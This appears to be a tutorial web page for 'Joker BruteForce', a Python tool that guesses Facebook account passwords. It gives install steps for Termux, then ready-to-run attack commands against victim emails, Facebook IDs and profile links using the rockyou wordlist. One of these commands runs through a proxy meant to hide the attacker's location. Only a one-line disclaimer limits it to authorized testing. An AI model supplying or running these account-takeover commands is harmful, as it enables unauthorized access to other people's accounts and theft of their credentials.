Joker BruteForce – Facebook Bruteforce Tool Commands

JOKER Brutal Force is a Python script that tests Facebook account passwords using a brute force attack method. It tries different passwords from a wordlist to check if any of them work on a target account. You can run this tool on Termux, Kali Linux, or any system that has Python installed. Use it to test your own Facebook account strength or for authorized security assessments only.

Install Joker Brute in Termux

Below are the simple steps to install and run Joker Brute on Android using Termux. Open Termux and run the commands one by one.

Update Termux packages first:

apt update

Install Git package:

apt install git -y

Install Python, Python2 and required libraries:

pkg install python python2 && pip install requests mechanize

Clone Joker Brute repository from GitHub:

git clone https://github.com/fikrado/JOKER-burtal-force

Navigate into the Joker Brute directory:

cd JOKER-burtal-force

Run the tool to see the menu:

python joker.py

Usage commands

After installation, you can use different commands to simulate attacks. Below are the usage examples.

Attack using email and wordlist file:

python joker.py -t Victim@gmail.com -w /wordlists/rockyou.txt

Attack using Facebook ID and custom wordlist path:

python joker.py -t 100001013078780 -w wordlist_file.txt

Attack using email, wordlist, and proxy server:

python joker.py -t Victim@hotmail.com -w wordlist.txt -p 144.217.101.245:3129

Attack using email and single password:

python joker.py -t Victim@gmail.com -s 1234567

Attack using Facebook profile link:

python joker.py -g https://www.facebook.com/Victim_Profile

Understanding the Commands

CommandWhat it does
-tTarget email, phone number, or Facebook ID.
-wPath to wordlist file containing passwords.
-pProxy server address for hiding your location.
-sSingle password to test against the account.
-gFacebook profile link of the target.
SHARE THIS POST: